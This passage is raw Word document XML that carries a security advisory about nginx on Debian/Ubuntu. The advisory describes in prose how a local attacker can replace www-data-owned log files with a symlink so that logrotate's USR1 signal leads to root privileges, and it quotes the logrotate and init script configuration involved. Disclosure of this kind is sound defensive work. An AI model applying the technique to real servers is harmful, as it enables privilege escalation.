      </w:r>
    </w:p>
    <w:p w14:paraId="10495524"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rw-r--r-- 1 root     root    0 Nov 12 22:47 /var/log/nginx/error.log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68540A8F" w14:textId="77777777" w:rsidR="00254A81" w:rsidRPr="002B24A4" w:rsidRDefault="00254A81" w:rsidP="00254A81">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B2610E6" w14:textId="77777777" w:rsidR="00254A81" w:rsidRPr="002B24A4" w:rsidRDefault="00254A81" w:rsidP="00254A81">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E63388B"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As the /var/log/nginx directory is owned by www-data, it is possible for</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F7D2967"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local attackers who have gained access to the system through a vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FAA2677"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in a web application running on Nginx (or the server itself) to replace</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D927918"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 xml:space="preserve">the log files with a symlink to an arbitrary file. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773C9410" w14:textId="77777777" w:rsidR="00254A81" w:rsidRPr="002B24A4" w:rsidRDefault="00254A81" w:rsidP="00254A81">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A091DE0"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Upon nginx startup/restart the logs would be written to the file pointed to</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ACC0226"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by the symlink.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F7B5B98" w14:textId="77777777" w:rsidR="00254A81" w:rsidRPr="002B24A4" w:rsidRDefault="00254A81" w:rsidP="00254A81">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A75D6B9"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This allows attackers to escalate privileges to root.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55BB3E76" w14:textId="77777777" w:rsidR="00254A81" w:rsidRPr="002B24A4" w:rsidRDefault="00254A81" w:rsidP="00254A81">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B582B1C" w14:textId="77777777" w:rsidR="00254A81" w:rsidRPr="002B24A4" w:rsidRDefault="00254A81" w:rsidP="00254A81">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="507A7669"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Attackers who have managed to replace the log file with a symlink would</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="051D7E8D"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 xml:space="preserve">have to wait for nginx daemon to re-open the log files. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="578CA9FC"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For this to happen nginx service needs to be restarted, or the daemon needs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A61FC51"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 xml:space="preserve">to receive a USR1 process signal. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C198C1D" w14:textId="77777777" w:rsidR="00254A81" w:rsidRPr="002B24A4" w:rsidRDefault="00254A81" w:rsidP="00254A81">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B210275"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 xml:space="preserve">However, the USR1 is sent automatically on default installations of </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C683F1B"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 xml:space="preserve">Debian-based systems through logrotate script which calls do_rotate() </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7649F1B5"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function as can be seen in the files quoted below:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DCA932F" w14:textId="77777777" w:rsidR="00254A81" w:rsidRPr="002B24A4" w:rsidRDefault="00254A81" w:rsidP="00254A81">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F7D313D" w14:textId="77777777" w:rsidR="00254A81" w:rsidRPr="002B24A4" w:rsidRDefault="00254A81" w:rsidP="00254A81">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70D6CFB8"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 /etc/logrotate.d/nginx ]--------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BEBA885" w14:textId="77777777" w:rsidR="00254A81" w:rsidRPr="002B24A4" w:rsidRDefault="00254A81" w:rsidP="00254A81">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AACFF10"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var/log/nginx/*.log {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C1CF51"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ab/>
        <w:t>daily</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B3B53B5"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ab/>
        <w:t>missingok</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E071534"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ab/>
        <w:t>rotate 52</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C54C8D"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ab/>
        <w:t>compress</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C167CD7"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ab/>
        <w:t>delaycompress</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75BFFFBF"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ab/>
        <w:t>notifempty</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C33E34"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ab/>
        <w:t>create 0640 www-data adm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A364435"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lastRenderedPageBreak/>
        <w:tab/>
        <w:t>sharedscripts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE36DA3"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ab/>
        <w:t>prerotate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F1CB86"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ab/>
      </w:r>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>if [ -d /etc/logrotate.d/httpd-prerotate ]; then \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0819AE32"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ab/>
      </w:r>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>run-parts /etc/logrotate.d/httpd-prerotate; \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C3C77D3"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ab/>
      </w:r>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>fi \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16CDB452"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ab/>
        <w:t>endscript</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C8B5905"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ab/>
        <w:t>postrotate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E30D9A"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ab/>
      </w:r>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>invoke-rc.d nginx rotate &gt;/dev/null 2&gt;&amp;1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="798D9F4A"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ab/>
        <w:t>endscript</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4924CBA0"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A488C7" w14:textId="77777777" w:rsidR="00254A81" w:rsidRPr="002B24A4" w:rsidRDefault="00254A81" w:rsidP="00254A81">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A1FF0FD"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="366D0AAE" w14:textId="77777777" w:rsidR="00254A81" w:rsidRPr="002B24A4" w:rsidRDefault="00254A81" w:rsidP="00254A81">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="103F76ED" w14:textId="77777777" w:rsidR="00254A81" w:rsidRPr="002B24A4" w:rsidRDefault="00254A81" w:rsidP="00254A81">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DC22109" w14:textId="77777777" w:rsidR="00254A81" w:rsidRPr="002B24A4" w:rsidRDefault="00254A81" w:rsidP="00254A81">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B7A4649"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 /etc/init.d/nginx ]-----------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE74DA4"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="409A4E5E" w14:textId="77777777" w:rsidR="00254A81" w:rsidRPr="002B24A4" w:rsidRDefault="00254A81" w:rsidP="00254A81">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7ABD320E"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do_rotate() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47362EFC"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 xml:space="preserve">        start-stop-daemon --stop --signal USR1 --quiet --pidfile $PID --name $NAME</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B5429B"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 xml:space="preserve">        return 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C8EB9B"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F037519" w14:textId="77777777" w:rsidR="00254A81" w:rsidRPr="002B24A4" w:rsidRDefault="00254A81" w:rsidP="00254A81">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12B0071E"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060DC4DF" w14:textId="77777777" w:rsidR="00254A81" w:rsidRPr="002B24A4" w:rsidRDefault="00254A81" w:rsidP="00254A81">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5946509D"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="798F7A50" w14:textId="77777777" w:rsidR="00254A81" w:rsidRPr="002B24A4" w:rsidRDefault="00254A81" w:rsidP="00254A81">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="105442C1" w14:textId="77777777" w:rsidR="00254A81" w:rsidRPr="002B24A4" w:rsidRDefault="00254A81" w:rsidP="00254A81">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B91AAFA"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The logrotation script is called daily by cron.daily on default Ubuntu/Debian</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E58E985"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installations at 6:25am every day.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64039610" w14:textId="77777777" w:rsidR="00254A81" w:rsidRPr="002B24A4" w:rsidRDefault="00254A81" w:rsidP="00254A81">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78A0E2AA"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If /etc/logrotate.d/nginx has been set to rotate logs 'daily' then attacker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F248174"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 xml:space="preserve">could gain root privileges within 24h upon the next log rotation without any </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468715FC" w14:textId="77777777" w:rsidR="00254A81" w:rsidRPr="002B24A4" w:rsidRDefault="00254A81" w:rsidP="00254A81">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">system admin interaction. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47632C07" w14:textId="77777777" w:rsidR="00254A81" w:rsidRPr="002B24A4" w:rsidRDefault="00254A81" w:rsidP="00254A81">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="429CED52" w14:textId="77777777" w:rsidR="00254A81" w:rsidRPr="002B24A4" w:rsidRDefault="00254A81" w:rsidP="00254A81">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19494865" w14:textId="77777777" w:rsidR="00254A81" w:rsidRPr="002B24A4" w:rsidRDefault="00254A81" w:rsidP="00254A81">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B6B09DC" w14:textId="77777777" w:rsidR="00254A81" w:rsidRPr="002B24A4" w:rsidRDefault="00254A81" w:rsidP="00254A81">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4465F51E" w14:textId="77777777" w:rsidR="00254A81" w:rsidRPr="002B24A4" w:rsidRDefault="00254A81" w:rsidP="00254A81">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16796295" w14:textId="77777777" w:rsidR="00254A81" w:rsidRPr="002B24A4" w:rsidRDefault="00254A81" w:rsidP="00254A81">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49C7AA12" w14:textId="77777777" w:rsidR="00254A81" w:rsidRPr="002B24A4" w:rsidRDefault="00254A81" w:rsidP="00254A81">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BD45A5F" w14:textId="77777777" w:rsidR="00254A81" w:rsidRPr="002B24A4" w:rsidRDefault="00254A81" w:rsidP="00254A81">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C9B9C37" w14:textId="77777777" w:rsidR="00254A81" w:rsidRPr="002B24A4" w:rsidRDefault="00254A81" w:rsidP="00254A81">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28C4E28B" w14:textId="77777777" w:rsidR="00254A81" w:rsidRPr="002B24A4" w:rsidRDefault="00254A81" w:rsidP="00254A81">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2433AC04" w14:textId="77777777" w:rsidR="00254A81" w:rsidRPr="002B24A4" w:rsidRDefault="00254A81" w:rsidP="00254A81">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D5ACDCC" w14:textId="77777777" w:rsidR="00254A81" w:rsidRPr="002B24A4" w:rsidRDefault="00254A81" w:rsidP="00254A81">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F95FBBA" w14:textId="77777777" w:rsidR="00254A81" w:rsidRPr="002B24A4" w:rsidRDefault="00254A81" w:rsidP="00254A81">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47E6E8B5" w14:textId="77777777" w:rsidR="00254A81" w:rsidRPr="002B24A4" w:rsidRDefault="00254A81" w:rsidP="00254A81">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="007A554E" w14:textId="77777777" w:rsidR="00254A81" w:rsidRPr="002B24A4" w:rsidRDefault="00254A81" w:rsidP="00254A81">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="702733E0" w14:textId="77777777" w:rsidR="006118D8" w:rsidRPr="002B24A4" w:rsidRDefault="006118D8" w:rsidP="006118D8">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6930"/>
          <w:tab w:val="left" w:pos="8550"/>
        </w:tabs>
        <w:ind w:left="-450" w:right="810"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>SECURITY VULNERABILITIES GENERATED BY CVE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AFE0E77" w14:textId="77777777" w:rsidR="006118D8" w:rsidRPr="002B24A4" w:rsidRDefault="006118D8" w:rsidP="006118D8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6930"/>
          <w:tab w:val="left" w:pos="8550"/>
        </w:tabs>
        <w:ind w:left="-450" w:right="810"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="68DA38D3" wp14:editId="16C2DEA8">
            <wp:extent cx="4533900" cy="714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3900" cy="714375"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7DB46F" w14:textId="77777777" w:rsidR="006118D8" w:rsidRPr="002B24A4" w:rsidRDefault="006118D8" w:rsidP="006118D8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6930"/>
          <w:tab w:val="left" w:pos="8550"/>
        </w:tabs>
        <w:ind w:left="-630" w:right="810"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4CE48B01" wp14:editId="76B57323">
            <wp:extent cx="6738730" cy="2581109"/>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52517" cy="2586390"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="447FF1EC" w14:textId="77777777" w:rsidR="00581648" w:rsidRPr="002B24A4" w:rsidRDefault="00581648" w:rsidP="006118D8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6930"/>
          <w:tab w:val="left" w:pos="8550"/>
        </w:tabs>
        <w:ind w:left="-630" w:right="810"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A0EF463" wp14:editId="1AC23862">
            <wp:extent cx="6689035" cy="3305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91684" cy="3306484"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B70BE47" w14:textId="77777777" w:rsidR="004413C9" w:rsidRPr="002B24A4" w:rsidRDefault="004413C9" w:rsidP="006118D8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6930"/>
          <w:tab w:val="left" w:pos="8550"/>
        </w:tabs>
        <w:ind w:left="-630" w:right="810"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="27F9C6D8" wp14:editId="344E0BA2">
            <wp:extent cx="6810375" cy="1076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10375" cy="1076325"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
